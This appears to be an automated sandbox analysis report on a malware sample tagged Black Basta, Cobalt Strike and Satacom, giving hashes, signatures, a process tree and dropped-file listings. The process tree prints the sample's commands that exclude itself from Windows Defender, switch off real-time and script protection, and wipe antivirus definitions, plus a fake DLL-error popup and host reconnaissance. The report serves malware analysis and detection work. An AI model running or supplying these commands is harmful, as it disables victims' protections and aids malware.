Analysis

  • max time kernel
    103s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 19:59

General

  • Target

    2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe

  • Size

    11.1MB

  • MD5

    94c2ef04d8946bcd15ef2e7cbbe64551

  • SHA1

    c617dd782537e94b31a4af176b23a919d7429d18

  • SHA256

    6f344b47460663c01469e6b8c5ac322a8f89c9ae3792021d5385a1ac5d6dc6cf

  • SHA512

    7f6cab8b9a9b7820a6b9a0508dd7ecb7c1edb41f546cd29adda462ba026320d0ff4bd845ec0c50992fe01f1b950529875255b6f5da075e382536462ab14aa872

  • SSDEEP

    196608:9Wg06kF02I+ItwfI9jUCD6rlaZLH7qRGrGIYEw1coZy8FUsOnAod:it3NIH20drLYEuZjod

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Loads dropped DLL 18 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 48 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4424
    • C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-03-26_94c2ef04d8946bcd15ef2e7cbbe64551_black-basta_cobalt-strike_satacom.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4120
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('There are incomplete DLL files on your computer to run this program. Please download the files and restart the program. acdclclient33u.dll .acdintouch40.dll', 0, 'DLL files', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2356
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('There are incomplete DLL files on your computer to run this program. Please download the files and restart the program. acdclclient33u.dll .acdintouch40.dll', 0, 'DLL files', 0+16);close()"
          4⤵
            PID:5056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:668
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4032

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\VCRUNTIME140.dll

      Filesize

      117KB

      MD5

      862f820c3251e4ca6fc0ac00e4092239

      SHA1

      ef96d84b253041b090c243594f90938e9a487a9a

      SHA256

      36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

      SHA512

      2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_bz2.pyd

      Filesize

      50KB

      MD5

      94309558eb827e8315d0f201bbe7f2b1

      SHA1

      b0a511995528860239b595774a1912e8f1220c42

      SHA256

      fe14d1af436b07370607c6798c3eb15fc439837cc9cbe7cbc3271b07c9ed55b6

      SHA512

      1163da89470b4f4f11786961d2b24a0c01939a174415fac8321f402d85c067572f18d7a8f43ec8abdcc6f14dc76f780ec36004ac34593988240f6a7642e60365

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_ctypes.pyd

      Filesize

      64KB

      MD5

      fc40d41aff12417142c0256e536b4a1a

      SHA1

      237157d6af4ec643c4d8480cf3d332951a791cc1

      SHA256

      0712d9412ea0d276c9a726765c072e00146f5aea853818d177b1a5b425839641

      SHA512

      b7625a5325a5b184b1733931dc3857ea5c118d85a506875dcb6b195c2372723b9c6cf80e4688c0fc1383ea063c9d831dd4c0e10ec429dd0f363aa678b1c99f6b

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_decimal.pyd

      Filesize

      119KB

      MD5

      0e02b5bcde73a3cc01534fba80ec0462

      SHA1

      decd14b79adf47cc74085beed8a997552d97b965

      SHA256

      286c99901c103d39c3e79bf30ce06f2825260e04ef7d2f0d77fcc08fb93e1d4b

      SHA512

      9556fbd408a5f5e0c21212cda2e2c164cd5093bb8668c152db4b72d03944f1f172ac8e0e194b3eedd1d4697ca2e7d50fcc77fe47014eda14ab658648005cb338

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_hashlib.pyd

      Filesize

      36KB

      MD5

      933a6a12d695c7d91ef78a936ab229c7

      SHA1

      ff16c267921ed4dd7f2a129df675a2bc6a52be2a

      SHA256

      60d239d691eb3e31d99848ba9167b5797c897b2896fa5605e61f5bce08e9cb11

      SHA512

      fd5416529061851e90aba6782e1550d9c48d0b10d39f52bd3ff984fbb88d0c06ee54675108508aad819d49362fb6ba74e9d3ad6dd0f3aa17654a07cae6ae099a

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_lzma.pyd

      Filesize

      87KB

      MD5

      042ac1b18a7f6fff8ed09ec9efa9e724

      SHA1

      643f3dca141f8fea4609b50907e910be960ce38a

      SHA256

      491b8a4f143c7a505e7c36a2279e84aca902e65a1e28aa6d50bcc37dbf6b5334

      SHA512

      940a44363d385e4e9fa23c06cf6d013d2585424e6a174e2afbdaa5a0cd21836a5df438859eff45a3b6e70e47322d8c8c5fa5d83315be34cfd6769e8fc2084a21

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_queue.pyd

      Filesize

      27KB

      MD5

      1073d3147f0d6a1880b78a5a5695fc70

      SHA1

      d97b690c490a51182e9757c15d14dfefd840e746

      SHA256

      65ad239871835a3823401647b2dad935075b4e33a5913fd12d7f2a02b6c49d82

      SHA512

      45d046d2e702447aa00bada25d76fe17c3a4c8822ac62739fe820e9eac66c5262323d66ad90cddde31dd01ecd6db0128cd96950e9857c9c5c59524027c75255f

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_socket.pyd

      Filesize

      45KB

      MD5

      fcfdf8cd83a8d506a4483a72eb57026c

      SHA1

      74428908c0068c3de2f4281aba16c13cdd28be04

      SHA256

      2a6b686817b640dcabc58e60289d9ace9ace3e4bc217d78953439549cee65a8a

      SHA512

      3b63e08370fa76ca8c81fc7639492367d250d507f0fb7e0e582078997ba2fa246c48eeaa9faed866dface4fcb08319096a83048dc333ad4be21947f5146b1768

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\_sqlite3.pyd

      Filesize

      59KB

      MD5

      1e16d084725d9b79f17ccb1996df7410

      SHA1

      3c49ba7b3acf317eedaa7c75319f1b39f91b79ba

      SHA256

      cc17586da3a099b45644ce76cd53ffcb3f5836e9db213152e3a880569c50ca7a

      SHA512

      4932f891e386792a03f6340ac7c9fe9dfd52e6f4a948951520c24b5f6204b26e3fc9455658e52efdce188a98c1e0f33d86493547dad47517ffafb9bb2c088549

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-console-l1-1-0.dll

      Filesize

      12KB

      MD5

      03a223af1da8e23b936631019c097a04

      SHA1

      a4a96a7ed9f09ddb3add97f91123017bdb2534a4

      SHA256

      397486f5f0fa11471eb89fc837210abf0b25871607c7bb552e6d58acc92b7d72

      SHA512

      81e71ae184c248c1659762d911da054cc61f64005bf7fe4b15a30d150fce2d28c0f7a983c491f786c00a0ddbe7fe456aa228ff8fd9df642bb235cef37ce4ebf7

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-datetime-l1-1-0.dll

      Filesize

      11KB

      MD5

      5f6287f8ccf194d73a54a971da906520

      SHA1

      e6dfaa45adb0a92a5ca54c06feb296bccda03dc9

      SHA256

      d72724ce087bb75333f3758aca9fb05e14c0a81cf2a11bf9220a3461b523b35d

      SHA512

      06de3a1f50d05d251406c54ca56a0ec9733896a28c414eee1ae774382d75846a812304a9a2c8b19143ec362d4e060969db2516e7ae43e4f5056b077a9f168fbe

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-debug-l1-1-0.dll

      Filesize

      11KB

      MD5

      b46679ead66350f23baea3e5bbed26e3

      SHA1

      c665b9f27c9dca2265238f3fd83c41858cbcb3dc

      SHA256

      0ae6637ffd04b6d8bf8df254d95ef23acc8faf5911fa14edd69ba2c29ba8f185

      SHA512

      2feba480a80b7cf3fd824b04958e4a390d1ab5fa128d9a49da3713ba5a3e384df894cbaccd380aa154d10beb99366d6cd3e7f360cbff1388c83e4a5af235d4fc

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-errorhandling-l1-1-0.dll

      Filesize

      11KB

      MD5

      c70bc6950514139de25a7bf78d01cbf5

      SHA1

      0a325dcd1f3ab24f5cc4f9ce2856be8553af46ce

      SHA256

      e12cc29187652d8162e93b7e178281c05566dc581b7922aabe85077855665984

      SHA512

      3e9d61d1ad9465ceacfe3cd2bf58b7ff482e474fbef47a42375e47f7dd68ed6eac84e443f2bff23ca4ade069ff69938f2702a2f5f9bbca4c621c3205e29a86e5

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-file-l1-1-0.dll

      Filesize

      15KB

      MD5

      e8c76b0cad0f6a1fd8275bf23d293f92

      SHA1

      b9abe59983237199e2a1c88f070f024cd376be46

      SHA256

      926b60354d988fc19e73c710229c46acd32d42834fadff2b1fc5cc9bfd68397f

      SHA512

      a617d51b14650b79d938296b14c7b0f5f3155eeb36e875a5c6d9161971a9a9d96fd5d2189f283917cde251b05c9f46ea7515441dd335c6f66007a850faf19cdf

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-file-l1-2-0.dll

      Filesize

      11KB

      MD5

      c7b0dcd9935da9bdc9b390b4b0a9abac

      SHA1

      a38eda8861819b9d6df0fc69a3664bd05634d884

      SHA256

      e04ec04a6c3d0dd77918bd671ac0b14a00865cec66ba995a1e369eced65ca89a

      SHA512

      3f0a02f441911bfdd81bd892149f14b29e6276dce75b39fbeedae96ed4d20dde947dd95e5c8a4562eeca7864d8c58b57307690687600a5ea707f17d6665d3d22

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-file-l2-1-0.dll

      Filesize

      11KB

      MD5

      7bd70a0b41ff61d8a0fab8dfb0328d92

      SHA1

      29b437879f6b30293cbb37d6539de81767c83798

      SHA256

      30399597b801d89cb7da031ee82bf06685f2865a2aee89356b71a387a484cba4

      SHA512

      209ee90b05abc7d9b0088d94bcd2872b84d27254135d0bbbf1933409b2c62fe9dc4666a4a6b06731d287208a16c813e0478003b5394dbc48c04e2a65aa08f3f9

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-handle-l1-1-0.dll

      Filesize

      11KB

      MD5

      0b5d110a0cd6132f62cbf0017111c920

      SHA1

      dc0d4896e9acf9e7d21fafd46ff3944f2a61a4bd

      SHA256

      76e7bec42d09880973bc4925708f710151ac1ff9b915ac4102ccf591f08c987d

      SHA512

      7cd6b81e9a119dfffffb181edbfc040afe3e5a9aa99abb9c2a053f6db7b651a0e470908f69adb7672076017873e5dd5782f1739700e3c155f15f750afececa9b

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-heap-l1-1-0.dll

      Filesize

      11KB

      MD5

      28c8dccd9300103fabd0b946764ea971

      SHA1

      210d4154e05270955c752a89791b2a37c60cb045

      SHA256

      61dfae09b998b4fb208c282a9c61523b810e8afdab6ef1abe6931aa2606bdb9c

      SHA512

      6af5b202d2df3e20cd94d883087298b7e2d5e840210363c30dc02261a898387c3fd1830a740404f8b85159888061e1d4bb4834a688bf9edfe2d6dbdb11816bff

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-interlocked-l1-1-0.dll

      Filesize

      11KB

      MD5

      42abe5337196c9223d85cb7592ae3bae

      SHA1

      46732058bfda90adaf3c3b57bdd402d6f79ec1ce

      SHA256

      7854c9b8e70b0e261784492db82873c7f84e427d9411686bb41c1172fecbf152

      SHA512

      cf6e36c04747dc31bdc5bde59598560aac05e601b30115448b667ddaf8e8c4f07cd46ffd76eb5848a9204120fc106bf560d40ddbdb75a5974b814d3ef6d0579e

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-libraryloader-l1-1-0.dll

      Filesize

      12KB

      MD5

      32017d873c1a09df333c7ad0256c67fb

      SHA1

      4c3f1ce157cfe8f8ca28ebde8abba40360f752bc

      SHA256

      c764a1dd417aba873b3bcbb4e256de3694e702701b30b6ea5b743b58f3732ee6

      SHA512

      3dbf0965c50721e64b835fddabf5cfbd7d6308f069e8fc997521b12e6976cd828aaddf2fe7da2efa7ab69888b8930474b0238f36d7b0ad254f428030d4e96745

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-localization-l1-2-0.dll

      Filesize

      13KB

      MD5

      464df4108fd3c92b67953adfd272d093

      SHA1

      324080f43258ba7c9a70f88f9067fad4f77cd8d5

      SHA256

      bf05002e9a83b94196ae0f1b1f53e8ba1356801b02bb7181b27edb5437988ded

      SHA512

      41469c50a74f4f05528689cb5d58ab0e5463ae4d5db8e3334e6f2fa013860e399e48ce8389e0c99d002274e88252cbf5eba6686c9ad82422acda73b271032908

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-memory-l1-1-0.dll

      Filesize

      11KB

      MD5

      3302351ee399b465651b2dad8719f116

      SHA1

      8ab4bd4fd0e493ecbd30a5f5d9f22ba807a2b292

      SHA256

      12e1b1299659686c57674477cbb7fe9092593bab4119a9b0e79138d2a3e715c8

      SHA512

      bbbaa02e6e264fe58c4a6558855cecb6f5f457686a08a98710d2077e9c1b566d6f5ade4ad421751177eceb50e7ccd4865040f9fabd8270cc650aec76fc94e31f

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-namedpipe-l1-1-0.dll

      Filesize

      11KB

      MD5

      37b60063f4f1d7605cdb7dec2947b5cf

      SHA1

      1e39a84d3046c24d52e5c5e00dd9cf11444d0116

      SHA256

      5698bbc568d9f26e1302cabf1f96d0e36b79800559625946c883384a94d65c33

      SHA512

      2fbc808a476edb635a2d3c5b1a1ef08c156f5a34a3a1739f8faa3c1c69f863b02dd7e89010458ae69d253f7ec631a2ee482019076613af2d33f6e9e5af547b86

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-processenvironment-l1-1-0.dll

      Filesize

      12KB

      MD5

      f437d384d5105aa614a9bbb398d05839

      SHA1

      3a29872662cac5e64883c1b0373b378a5c184825

      SHA256

      0ce1ab14940be51d82638217c480fb7fd8c58d84f83a1b8afd07b75f5089acf6

      SHA512

      bd23711b2cffe28ca1810f0812b9d731955c5e2a5fda8de6d43754d6924f0724f844eab38e1e132c380ee264512438039e98e502f2e8e5e8bcebe84b40c6b398

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-processthreads-l1-1-0.dll

      Filesize

      13KB

      MD5

      ffb7914c55dc87c2398feea836cd9653

      SHA1

      44250a528bfc10e0f9eb4cd1b7cda5b112dc8700

      SHA256

      c82baae6e8f01af6839d96578ad46720ada816be21295ae9929a55d5d833288f

      SHA512

      b1c0f38e0f1a4ab80000b0fde7ce4a867c18379bb36114724515eccc53130a664a3c39ec1fd3fbc0bbb4dce1c100e7db443fdc45117840238e42339a2ba8ae2b

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-processthreads-l1-1-1.dll

      Filesize

      12KB

      MD5

      1dd85830bd6f8eb28aa32e23a02514c9

      SHA1

      3aa0aa5bdd4b4f5efde15d59fe5ad8c54f8b1d26

      SHA256

      e2e2e55c67c0caf51b06b1fb308accfbc14155decb1cca98af5500fb7fba6296

      SHA512

      1ad7d99f039434f94ca675ed6a9ea6b0d4c9e957190f38e778df349bbcee28cabab618c1e2d097af00585dcdbdc846c44fffc42730b182235128a6b01f2438bd

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-profile-l1-1-0.dll

      Filesize

      11KB

      MD5

      fff17e531242588ead93dd5c0cf7c8e5

      SHA1

      abb6f4000ff2b9f3b4d6e7523eaee5132bbee43e

      SHA256

      6d0e0ba6447ed4999f902d8d11eec7a0cbc3da930b5c54b3b3caea873c469c5a

      SHA512

      7568ba4debe5004d28b60429acfe0d7037d38aeae864e8e70b1c337e28482b010edb4c0a17f4acf701ff06ae8619c35e6594dc7ac4d6d1eb3c4cb1feae87fc5d

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-rtlsupport-l1-1-0.dll

      Filesize

      12KB

      MD5

      351ba257c7bcd632641fc513a99fa214

      SHA1

      989640b54246c4bf3bdfbf27fa61a7ef3bb5baf3

      SHA256

      024a97c745096191a8df9d581efcbefcfbfd0e73c636773941b251642004577c

      SHA512

      8ebf676649cbafd758bebe14c8878b326378d546e0ec08fe78178e215fffd36d521f99ba6ab9bd94d323ece04ccca450b46011e5ecb87fd5fb8ae2af457946c1

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-string-l1-1-0.dll

      Filesize

      11KB

      MD5

      62db3879a0d33ca248548adf065a257c

      SHA1

      5f14b6583bad928270eae6237f03f7e7f53156c9

      SHA256

      0b5e2922492e61ff23a95969a1cfdba191898302938b67a4283199dfbe2fa9be

      SHA512

      ed92c29aa20eb9d4009c221cb37c21bee57c21533f0f80ea1a29783afdc94e850a1ca2397a04ddc773b41f05cd7eaa610c6c80eb7cdb1295c6b1af9a3e638957

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-synch-l1-1-0.dll

      Filesize

      13KB

      MD5

      e6a854dafa9a44475fb08df425e6eaa9

      SHA1

      9e34b9d83234828b45bb21a50acbf153f343d2b4

      SHA256

      42f0bc17a510dfc87477510f070556740c24745c66a6dfcc38ac857e22bacff6

      SHA512

      de7660923b38fb3b07dcbe59455100bec75d3940756a36e6cfd815dc3d2c2b565dcc12fc29fdac26ddb9d3833d4d77ddf2c802aa8eee4cf4a3dd5ed1f25bb2b5

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-synch-l1-2-0.dll

      Filesize

      11KB

      MD5

      b472cb62fd29f5686ff6c04b6cbba074

      SHA1

      56ec685c0a09f62075bb404f96b76d6abc6e114b

      SHA256

      02c4e2dc2c922f17e1e174af76253775ee0ab2f83c421fd769591ce010fb1afd

      SHA512

      da9f551268c87d756a9e4dd55bfb2eddc04b9ccc584b348a13d45c82e2f00a4da8a1baa7182ae2eb8048b8d479634c8d184db1599a45ff89250950b483334f99

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-sysinfo-l1-1-0.dll

      Filesize

      12KB

      MD5

      7dfacfba5289060a1fa87e4f37efc0fe

      SHA1

      9e13d9d80c489c1d6d877f51b69e1157e7e4fbb7

      SHA256

      28b17340d6861ec8da158498a13323a696f71fd97e9f72fa71d9d54d95ab466a

      SHA512

      719e83e9b249fefc6f671bf02b6171f4f67f96d6cd03f9d4d910bde370652ebae3efdcb7325078252340a4733e7c8397dd2a29f3ae26a045a63a4b4017a2e1d3

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-timezone-l1-1-0.dll

      Filesize

      11KB

      MD5

      83e18ee6246907ba1de2715692c113c7

      SHA1

      a18e09d763330acf895ed276cc34597ff12a0319

      SHA256

      f2f3a2519f439a68e85e54df2277b49758765c3fa80f10be8186e95fad0f481f

      SHA512

      27c374e1c39c837dd48bbb415556145b41406d6881d90ec4cf4876fcb7bd6e856759a0eb4feac2afc8b008c449de9a8fbcbd9a1136ed4a20180693c89e63e365

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-core-util-l1-1-0.dll

      Filesize

      11KB

      MD5

      e3a5b4fb020cc0d8a2237fca3fe5c70c

      SHA1

      99b640506e5ab063aecc2163999630efa91fa9a8

      SHA256

      997ea6ac7e3a7694bec331b3fa4dd03ac0d7e5f721c87b84b7d2d533140c31b6

      SHA512

      2079278ba997d4f599227217247f3815b391904e789849ffabb67fd008d3bb9df740884050d6f075b1db738a82e857456d38aaf397cd297d223db7e5205a1ac0

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-conio-l1-1-0.dll

      Filesize

      12KB

      MD5

      057bd0abef440891440a32c9ff22ae4e

      SHA1

      4b73e7be26b100bf2e81475a1f04433a6d912569

      SHA256

      b1d8cde490382992d4c73a75c532999bd25fcf4dc484e99c4df0da3bb8eab064

      SHA512

      87b524a001a7c57ff721549f0b03b1b5103685e2da2dc10e3d4e0fedc276fc2aca0954c12b4504a97373d5292fc57563ffcf4046a70b8e0b4d6e3b071014b386

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-convert-l1-1-0.dll

      Filesize

      15KB

      MD5

      c8dbf0ca88facfe87899168a7f7db52c

      SHA1

      e2cf163ad067b5d3b19908a71ed393711f66cd09

      SHA256

      94b6e91b93c2202dabd659bff294bee87c22897a30a6b4930b49051c2fb502dc

      SHA512

      e85c738f5d5a0ae6c3ef75a082712cb3cf2feae4560d316cb110e4eaf3a97d6058d5374da2a5edde39c3114f9aff8a027cbdff8cf49be2425943bac09c39e70b

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-environment-l1-1-0.dll

      Filesize

      11KB

      MD5

      9653409a06cf90aeae4491ee6a66125c

      SHA1

      ce0565b4212fa2d9824ab52c151bc13836b981f6

      SHA256

      5833bf2d9a301ed80514e6133b0dff7c9ba152b4631fa6bc0153fdd696c0757f

      SHA512

      f09afaef6e848c133294a5e75fd8e5fde27b57d429fb504d2f97b42abbba4e0bd878ba84b89152558c3c721f2184a114faada7b77892222180450e99ab9de828

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-filesystem-l1-1-0.dll

      Filesize

      13KB

      MD5

      42a2a95f1bb940d01f55eb1674a81fe2

      SHA1

      f982f3bbb4dc3aaaba8df098d1b395846f7cba08

      SHA256

      51541ec6684b43157a85ea46a42ebed4555be06bed0d0d07ff3ea6377301318d

      SHA512

      de9a7a1a6a45e2f76105eaeafcc3c29adbff142dcf2586e147417045b897a9dcddec5e1b97acfc5d3fc9c8e3a508dbc3f607bf3df20a7435e74436f94cb056b6

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-heap-l1-1-0.dll

      Filesize

      12KB

      MD5

      98da186fd7d7873c164a51c5d7b77f1a

      SHA1

      725a8b8fdfbe6a1e85674f4b2a7c0dd08411e00b

      SHA256

      80139e4caa379d87b1d1dafc23ace71d2b330368115f6314140d4ae59c2a78e8

      SHA512

      587b49a24cc59d4dcb62b59f379d1c9010196a6551cfc99ffdd931eeb0172618f020863191e530d65ad198e57063c57ba6f70bcf80591304243268ea5513f806

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-locale-l1-1-0.dll

      Filesize

      11KB

      MD5

      ff48b107b2449a647c64baabd49408a1

      SHA1

      efb868ba125d9ff08474f02b9483d74c36a13cee

      SHA256

      7bb8644e565ad4bcfd890f9044bccb4d99953a740e9a500b1f820b2fdc3fc240

      SHA512

      4da2e4b727e7f31f8bffd680453c451b444bdf217c15cb36e353f8bb5ecb6c6481caa7d848558c7d94cfc2d1bc3551ace11e85ffc8ec7a7b570a59c294ea0216

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-math-l1-1-0.dll

      Filesize

      20KB

      MD5

      e10e077bb06209aedd0d0d378c758f73

      SHA1

      97a9053a311280678f8ef65dc4e25975c41bd4ee

      SHA256

      8a7bff1c918539a75c25568db25933d653c003e016fd7791a37186b42bbb7c20

      SHA512

      571c1fc4192320bd967b603e6cda917a62f4720eb4dcd557ec2913d2558c0cfe68f936198f5809934aaa3a1d6049e8e918eb0e638a7244df5c71ef0c78843191

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-process-l1-1-0.dll

      Filesize

      12KB

      MD5

      dabc28a5632a21e7f09accb9d69d10d7

      SHA1

      254da0966025e432b94a95b4700af76aed0dea73

      SHA256

      e53e39324294f677e238eec0c084440c3f23da171e6cb1e615a30504bf408a95

      SHA512

      6b5915efd7bde198deca1f6b9a68e483de2ac9d493a6999d5c7c2662c9b5b380f47d270d0fb98afccfc542cf78eaff1988c56eef33cd5a3f0a224256c94c33c1

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-runtime-l1-1-0.dll

      Filesize

      16KB

      MD5

      f91e1ff896b5616919ac97c7095c513e

      SHA1

      4ec6eed0bac5a8801db10238c7b3a5d35a87be67

      SHA256

      07382c0d91dad2bb6ba8bd06ea02f12c57abf7c4e5a70672e9f2954d09a4ffd4

      SHA512

      6448d6cdfde11e1805b6d381111ea062f681807c9dc54ae890305f287b13b6fb57ef3f4d3b909e56b81c99830c086b5702b46ba0f93e695fce2b87b32fa4b26a

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-stdio-l1-1-0.dll

      Filesize

      17KB

      MD5

      429c26ed27a026442f89c95ff16ce8c2

      SHA1

      69ed09faae00a980c296546c9b5e6a8d5f978439

      SHA256

      2a466648affd3d51b944f563bb65046a3da91006a0d90fb2c0b123487a1fc1b3

      SHA512

      04641164d9e1eb3183db0c406583626011dfe2b2574551c0ac466ebf44165afcd7d8faf356b8268b4fc9a54db20de010a4e4293594ad2e605950aea65636f4e5

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-string-l1-1-0.dll

      Filesize

      18KB

      MD5

      0f593e50be4715aa8e1f6eb39434edd5

      SHA1

      1117709f577278717c34365ce879bcd7c956069b

      SHA256

      bf4ea10be1b64c442ac0ccf4bdf69f6703467176a27e9e14a488d26448a6e179

      SHA512

      487dcbf7b7f18d62606cb2f05c8feff07e6ecda42e643f5919c6edda66cdb3b8cc393b0d260374f06c10cf54082410fc9f02bd87cc50866bc0c28b0bcec3e658

    • C:\Users\Admin\AppData\Local\Temp\_MEI44242\api-ms-win-crt-time-l1-1-0.dll

      Filesize

      13KB

      MD5

      56b870ccdbd25a5dbc2cfc072ba13bd7

      SHA1

      cb9f6acdcb7dd5a8f9d02a1280793440f66bfef3

      SHA256

      ac4e636f8e32a5d0fc274b56385abfbc301b2eecd7fd76e28f3d367543e6e65f

      SHA512

      135d652bd4f5d74451b6f4ed39fbb2df6f9ed2d16e2144c80a40b496d4131a4e5ca5a7615f69abe90122b69e9b43d5238da68df7c750e31f021ac6ffb0990d37

